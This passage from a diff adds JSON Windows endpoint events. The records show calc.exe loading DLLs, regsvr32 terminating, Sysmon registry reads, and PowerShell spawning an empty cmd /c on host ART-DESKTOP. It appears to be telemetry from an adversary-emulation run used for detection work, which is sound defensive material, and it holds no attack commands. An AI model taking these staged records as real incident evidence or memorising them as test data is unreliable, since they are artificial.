"pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "calc.exe", + "image_path": "C:\\Windows\\System32\\calc.exe", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 4724, + "process_name": "calc.exe", + 
"process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1216, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573241740000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": 
